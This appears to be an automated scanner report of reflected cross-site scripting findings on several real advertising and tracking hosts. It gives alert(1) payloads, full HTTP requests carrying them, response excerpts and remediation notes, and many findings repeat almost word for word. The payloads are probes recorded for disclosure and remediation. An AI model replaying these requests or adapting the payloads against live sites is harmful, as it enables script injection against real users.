function km_GetTrackingURL(param) { var val; switch (param.toLowerCase()) { case 'adsource': val = 'Other Sources'; break; case 'cpao': val = '0'; break; case ...[SNIP]... = 'Campaign not provided'; break; case 'cpag': val = 'AdGroup not provided'; break; case 'kmag': val = 'AdGroup not provided'; break; case 'kw': val = '65450';alert(1)//dc7176d7fd3'; break; case 'kmkw': val = '65450';alert(1)//dc7176d7fd3'; break; case 'kmmt': val = 'unk'; break; case 'kmmt': val = 'unk'; break; case 'kmrq': ...[SNIP]...
The value of the vid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6f006'%3balert(1)//ad02c86a733 was submitted in the vid parameter. This input was echoed as 6f006';alert(1)//ad02c86a733 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /KM2.js?x=1&lcc=0&vid=6f006'%3balert(1)//ad02c86a733&rnd=0.6996897698845714&las=0&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=1833889000-1&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1 Host: km6633.keymetric.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: */* Referer: http://www.hertzfurniture.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the disp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb907'%3balert(1)//67c803c981b was submitted in the disp parameter. This input was echoed as eb907';alert(1)//67c803c981b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /KMGCnew.js?mod=auto&cat=0&cbk=&tgt=&pat=888-793-4999&disp=%23%23%23-%23%23%23-%23%23%23%23eb907'%3balert(1)//67c803c981b&ctype=1&rnd=0.526470772922039&vid=8724330e5e1e4e0c9955f42eddb6ccbb HTTP/1.1 Host: km6633.keymetric.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: */* Referer: http://www.hertzfurniture.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the pat request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d727'-alert(1)-'0a43435fc7f was submitted in the pat parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /KMGCnew.js?mod=auto&cat=0&cbk=&tgt=&pat=888-793-49997d727'-alert(1)-'0a43435fc7f&disp=%23%23%23-%23%23%23-%23%23%23%23&ctype=1&rnd=0.526470772922039&vid=8724330e5e1e4e0c9955f42eddb6ccbb HTTP/1.1 Host: km6633.keymetric.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: */* Referer: http://www.hertzfurniture.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 18161<script>alert(1)</script>6d519406201 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /m2/guitarcenter/mbox/standard?mboxHost=www.guitarcenter.com&mboxSession=1317384164098-265536&mboxPage=1317384164098-265536&mboxCount=1&mbox=gc-b-pencil18161<script>alert(1)</script>6d519406201&mboxId=0&mboxURL=http%3A%2F%2Fwww.guitarcenter.com%2F%3FCJAID%3D10453836%26CJPID%3D2537521&mboxReferrer=http%3A%2F%2Fwww.mcafeesecure.com%2Fus%2Fforconsumers%2Fmcafee_certified_sites.jsp&mboxVersion=34 HTTP/1.1 Host: mbox12.offermatica.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: */* Referer: http://www.guitarcenter.com/?CJAID=10453836&CJPID=2537521 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: text/javascript Content-Length: 207 Date: Fri, 30 Sep 2011 12:03:42 GMT Server: Test & Target
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 9421b<script>alert(1)</script>90afb1bdcc7 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the prodid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 183de"><script>alert(1)</script>20f5a84f75e was submitted in the prodid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Fri, 30 Sep 2011 12:07:32 GMT Server: Apache Cache-Control: no-cache, must-revalidate Expires: Tue, 1 Jan 1970 01:01:01 GMT Pragma: no-cache P3P: policyref="http://media.gsimedia.net/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI" Set-Cookie: PrefID=20-2147483647; expires=Mon, 30 Sep 2013 00:07:32 GMT; path=/; domain=.gsimedia.net x_transtrans: .6.10.688 Content-Type: text/html Content-Length: 943 Connection: close
<HTML><BODY>
<!-- Google Code for Product Pages For Test Remarketing List --> <script type="text/javascript"> /* <![CDATA[ */ var google_conversion_id = 1071831421; var google_conversion_language = ...[SNIP]... <img src="http://tlcint.teracent.net/tase/int?adv=441&fmt=redir&sec=0&pid=prod&tpid=1312567322759&prodID=2870764183de"><script>alert(1)</script>20f5a84f75e" width="1" height="1" border="0" alt=""> ...[SNIP]...
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload e90b1<script>alert(1)</script>3e0bd49c5f1 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the ssv_TRT1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 636aa"%3balert(1)//907ac3db01e was submitted in the ssv_TRT1 parameter. This input was echoed as 636aa";alert(1)//907ac3db01e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
var xp1_i1 = new Image(); xp1_i1.src = "http://ad.doubleclick.net/activity;src=2204286;type=unive828;cat=unive678;u=xp_10|Homepage636aa";alert(1)//907ac3db01e||||||||||Pending|||OO-00000000000000000;ord=0981108?";
var xp1_i2 = new Image(); xp1_i2.src = "http://d.xp1.ru4.com/activity?_o=15607&_t=appdecl";
var xp1_i3 = new Image(); xp1_i3.src = "htt ...[SNIP]...
The value of the ssv_TRT10 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e9e3"%3balert(1)//90396dee028 was submitted in the ssv_TRT10 parameter. This input was echoed as 6e9e3";alert(1)//90396dee028 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
var xp1_i1 = new Image(); xp1_i1.src = "http://ad.yieldmanager.com/pixel?id=128439&t=2";
var xp1_i2 = new Image(); xp1_i2.src = "http://ad.doubleclick.net/activity;src=1889824;dcnet=4856;boom=118 ...[SNIP]... 4817853?";
var xp1_i3 = new Image(); xp1_i3.src = "http://ad.doubleclick.net/activity;src=2204286;type=unive828;cat=unive678;u=xp_10|ProductGroup||||45|169560|||Belkin+Laptop+Cushtop+Lap+Rest|39.996e9e3";alert(1)//90396dee028|Pending|||OO-00000000000000000;ord=4817853?";
var xp1_i5 = new Image(); xp1_i5.src = "http://ats.tumri.net/ats/ats?cmd=RT&AdvertiserID=3121&platform=T&ActionID=39&ActionName=RETARGETING_PILOT_2010 ...[SNIP]...
The value of the ssv_TRT11 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1fdf7"%3balert(1)//a543fbaa54e was submitted in the ssv_TRT11 parameter. This input was echoed as 1fdf7";alert(1)//a543fbaa54e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
var xp1_i1 = new Image(); xp1_i1.src = "http://ad.doubleclick.net/activity;src=2204286;type=unive828;cat=unive678;u=xp_10|Homepage||||||||||Pending1fdf7";alert(1)//a543fbaa54e|||OO-00000000000000000;ord=9274923?";
var xp1_i2 = new Image(); xp1_i2.src = "http://ad.yieldmanager.com/pixel?id=126805&t=2";
var xp1_i4 = new Image(); xp1_i4.src = "http://d.xp1.ru4.com/acti ...[SNIP]...
The value of the ssv_TRT5 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4dbae"%3balert(1)//17c7ffa0f8c was submitted in the ssv_TRT5 parameter. This input was echoed as 4dbae";alert(1)//17c7ffa0f8c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
var xp1_i1 = new Image(); xp1_i1.src = "http://ad.yieldmanager.com/pixel?id=128437&t=2";
var xp1_i3 = new Image(); xp1_i3.src = "http://ad.doubleclick.net/activity;src=2204286;type=unive828;cat=unive678;u=xp_10|Category||||39654dbae";alert(1)//17c7ffa0f8c||||||Pending|||OO-00000000000000000;ord=7055920?";
var xp1_i4 = new Image(); xp1_i4.src = "http://ad.doubleclick.net/activity;src=1889824;dcnet=4856;boom=11881;sz=1x1;ord=7055920?";
The value of the ssv_TRT6 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4d5d"%3balert(1)//ea0e712831d was submitted in the ssv_TRT6 parameter. This input was echoed as d4d5d";alert(1)//ea0e712831d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
var xp1_i1 = new Image(); xp1_i1.src = "http://ad.yieldmanager.com/pixel?id=128439&t=2";
var xp1_i2 = new Image(); xp1_i2.src = "http://ad.doubleclick.net/activity;src=1889824;dcnet=4856;boom=11882;sz=1x1;ord=4508591?";
var xp1_i3 = new Image(); xp1_i3.src = "http://ad.doubleclick.net/activity;src=2204286;type=unive828;cat=unive678;u=xp_10|ProductGroup||||45|169560d4d5d";alert(1)//ea0e712831d|||Belkin+Laptop+Cushtop+Lap+Rest|39.99|Pending|||OO-00000000000000000;ord=4508591?";
var xp1_i5 = new Image(); xp1_i5.src = "http://ats.tumri.net/ats/ats?cmd=RT&AdvertiserID=3121&platform=T&Action ...[SNIP]...
The value of the ssv_TRT9 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 23389"%3balert(1)//9f55b97ef3e was submitted in the ssv_TRT9 parameter. This input was echoed as 23389";alert(1)//9f55b97ef3e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
var xp1_i1 = new Image(); xp1_i1.src = "http://ad.yieldmanager.com/pixel?id=128439&t=2";
var xp1_i2 = new Image(); xp1_i2.src = "http://ad.doubleclick.net/activity;src=1889824;dcnet=4856;boom=118 ...[SNIP]... 1;ord=4135632?";
var xp1_i3 = new Image(); xp1_i3.src = "http://ad.doubleclick.net/activity;src=2204286;type=unive828;cat=unive678;u=xp_10|ProductGroup||||45|169560|||Belkin+Laptop+Cushtop+Lap+Rest23389";alert(1)//9f55b97ef3e|39.99|Pending|||OO-00000000000000000;ord=4135632?";
var xp1_i5 = new Image(); xp1_i5.src = "http://ats.tumri.net/ats/ats?cmd=RT&AdvertiserID=3121&platform=T&ActionID=39&ActionName=RETARGETING_PILO ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7d13c<img%20src%3da%20onerror%3dalert(1)>c049202440 was submitted in the REST URL parameter 4. This input was echoed as 7d13c<img src=a onerror=alert(1)>c049202440 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 58a14<img%20src%3da%20onerror%3dalert(1)>a91f95678f9 was submitted in the id parameter. This input was echoed as 58a14<img src=a onerror=alert(1)>a91f95678f9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ab7ea<img%20src%3da%20onerror%3dalert(1)>a50c18d4da6 was submitted in the REST URL parameter 4. This input was echoed as ab7ea<img src=a onerror=alert(1)>a50c18d4da6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 96fd6<img%20src%3da%20onerror%3dalert(1)>53234c08386 was submitted in the REST URL parameter 4. This input was echoed as 96fd6<img src=a onerror=alert(1)>53234c08386 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 12c0f<img%20src%3da%20onerror%3dalert(1)>26393e8caae was submitted in the REST URL parameter 4. This input was echoed as 12c0f<img src=a onerror=alert(1)>26393e8caae in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 82100<img%20src%3da%20onerror%3dalert(1)>7f0eeab06c9 was submitted in the REST URL parameter 4. This input was echoed as 82100<img src=a onerror=alert(1)>7f0eeab06c9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3bd65<img%20src%3da%20onerror%3dalert(1)>a4ac2cb2f1f was submitted in the REST URL parameter 4. This input was echoed as 3bd65<img src=a onerror=alert(1)>a4ac2cb2f1f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 32bcd<img%20src%3da%20onerror%3dalert(1)>50d44c30387 was submitted in the REST URL parameter 4. This input was echoed as 32bcd<img src=a onerror=alert(1)>50d44c30387 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 656aa<img%20src%3da%20onerror%3dalert(1)>cb60ea3b9ca was submitted in the REST URL parameter 4. This input was echoed as 656aa<img src=a onerror=alert(1)>cb60ea3b9ca in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9bc98<img%20src%3da%20onerror%3dalert(1)>524eba17d44 was submitted in the REST URL parameter 4. This input was echoed as 9bc98<img src=a onerror=alert(1)>524eba17d44 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 78a16<img%20src%3da%20onerror%3dalert(1)>a975e107cec was submitted in the REST URL parameter 4. This input was echoed as 78a16<img src=a onerror=alert(1)>a975e107cec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ca3cf<img%20src%3da%20onerror%3dalert(1)>1c211ad9899 was submitted in the REST URL parameter 4. This input was echoed as ca3cf<img src=a onerror=alert(1)>1c211ad9899 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 219b5<img%20src%3da%20onerror%3dalert(1)>2106a010781 was submitted in the REST URL parameter 4. This input was echoed as 219b5<img src=a onerror=alert(1)>2106a010781 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 66bc0<img%20src%3da%20onerror%3dalert(1)>988cc3be2c5 was submitted in the REST URL parameter 4. This input was echoed as 66bc0<img src=a onerror=alert(1)>988cc3be2c5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 20192<img%20src%3da%20onerror%3dalert(1)>eb12297c56f was submitted in the REST URL parameter 4. This input was echoed as 20192<img src=a onerror=alert(1)>eb12297c56f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f2acb<img%20src%3da%20onerror%3dalert(1)>49a8660ab72 was submitted in the REST URL parameter 4. This input was echoed as f2acb<img src=a onerror=alert(1)>49a8660ab72 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e6e7a<img%20src%3da%20onerror%3dalert(1)>1f348ca0caf was submitted in the REST URL parameter 4. This input was echoed as e6e7a<img src=a onerror=alert(1)>1f348ca0caf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f63ce<img%20src%3da%20onerror%3dalert(1)>e2b341d8488 was submitted in the REST URL parameter 4. This input was echoed as f63ce<img src=a onerror=alert(1)>e2b341d8488 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3a29d<img%20src%3da%20onerror%3dalert(1)>a56e65f57ee was submitted in the REST URL parameter 4. This input was echoed as 3a29d<img src=a onerror=alert(1)>a56e65f57ee in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ff049<img%20src%3da%20onerror%3dalert(1)>c45d55c3386 was submitted in the REST URL parameter 4. This input was echoed as ff049<img src=a onerror=alert(1)>c45d55c3386 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 691ad<img%20src%3da%20onerror%3dalert(1)>a0b7801804b was submitted in the REST URL parameter 4. This input was echoed as 691ad<img src=a onerror=alert(1)>a0b7801804b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 89349<img%20src%3da%20onerror%3dalert(1)>9970b79041e was submitted in the REST URL parameter 4. This input was echoed as 89349<img src=a onerror=alert(1)>9970b79041e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3780a<img%20src%3da%20onerror%3dalert(1)>ccf1da0184c was submitted in the REST URL parameter 4. This input was echoed as 3780a<img src=a onerror=alert(1)>ccf1da0184c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d7ade<img%20src%3da%20onerror%3dalert(1)>4de0d6e3704 was submitted in the REST URL parameter 4. This input was echoed as d7ade<img src=a onerror=alert(1)>4de0d6e3704 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c69de<img%20src%3da%20onerror%3dalert(1)>5ff80bd38ea was submitted in the REST URL parameter 4. This input was echoed as c69de<img src=a onerror=alert(1)>5ff80bd38ea in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ea396<img%20src%3da%20onerror%3dalert(1)>d92755f1b81 was submitted in the REST URL parameter 4. This input was echoed as ea396<img src=a onerror=alert(1)>d92755f1b81 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5e9f0<img%20src%3da%20onerror%3dalert(1)>14d7556acda was submitted in the REST URL parameter 4. This input was echoed as 5e9f0<img src=a onerror=alert(1)>14d7556acda in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f8436<img%20src%3da%20onerror%3dalert(1)>4a18df611cd was submitted in the REST URL parameter 4. This input was echoed as f8436<img src=a onerror=alert(1)>4a18df611cd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload abd28<img%20src%3da%20onerror%3dalert(1)>fb76b048c03 was submitted in the REST URL parameter 4. This input was echoed as abd28<img src=a onerror=alert(1)>fb76b048c03 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 63613<img%20src%3da%20onerror%3dalert(1)>843b3decd8d was submitted in the REST URL parameter 4. This input was echoed as 63613<img src=a onerror=alert(1)>843b3decd8d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1e841<img%20src%3da%20onerror%3dalert(1)>53ffb31ba6d was submitted in the REST URL parameter 4. This input was echoed as 1e841<img src=a onerror=alert(1)>53ffb31ba6d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cda49<img%20src%3da%20onerror%3dalert(1)>24c3235941 was submitted in the REST URL parameter 4. This input was echoed as cda49<img src=a onerror=alert(1)>24c3235941 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4bd8f<img%20src%3da%20onerror%3dalert(1)>810f9b9d03f was submitted in the REST URL parameter 4. This input was echoed as 4bd8f<img src=a onerror=alert(1)>810f9b9d03f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8a031<img%20src%3da%20onerror%3dalert(1)>790edd74f1f was submitted in the REST URL parameter 4. This input was echoed as 8a031<img src=a onerror=alert(1)>790edd74f1f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b5e77<img%20src%3da%20onerror%3dalert(1)>a9dc4d3a216 was submitted in the REST URL parameter 4. This input was echoed as b5e77<img src=a onerror=alert(1)>a9dc4d3a216 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e8920<img%20src%3da%20onerror%3dalert(1)>4b1acf1d81f was submitted in the REST URL parameter 4. This input was echoed as e8920<img src=a onerror=alert(1)>4b1acf1d81f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 78316<img%20src%3da%20onerror%3dalert(1)>531b9306b63 was submitted in the REST URL parameter 4. This input was echoed as 78316<img src=a onerror=alert(1)>531b9306b63 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ed66a<img%20src%3da%20onerror%3dalert(1)>01914ff037f was submitted in the REST URL parameter 4. This input was echoed as ed66a<img src=a onerror=alert(1)>01914ff037f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c75cb<img%20src%3da%20onerror%3dalert(1)>ac190edb460 was submitted in the REST URL parameter 4. This input was echoed as c75cb<img src=a onerror=alert(1)>ac190edb460 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cdb4c<img%20src%3da%20onerror%3dalert(1)>714edd83976 was submitted in the REST URL parameter 4. This input was echoed as cdb4c<img src=a onerror=alert(1)>714edd83976 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 21443<img%20src%3da%20onerror%3dalert(1)>14aa5599ecd was submitted in the REST URL parameter 4. This input was echoed as 21443<img src=a onerror=alert(1)>14aa5599ecd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 789ec'%3balert(1)//afdcaa50a62 was submitted in the id parameter. This input was echoed as 789ec';alert(1)//afdcaa50a62 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
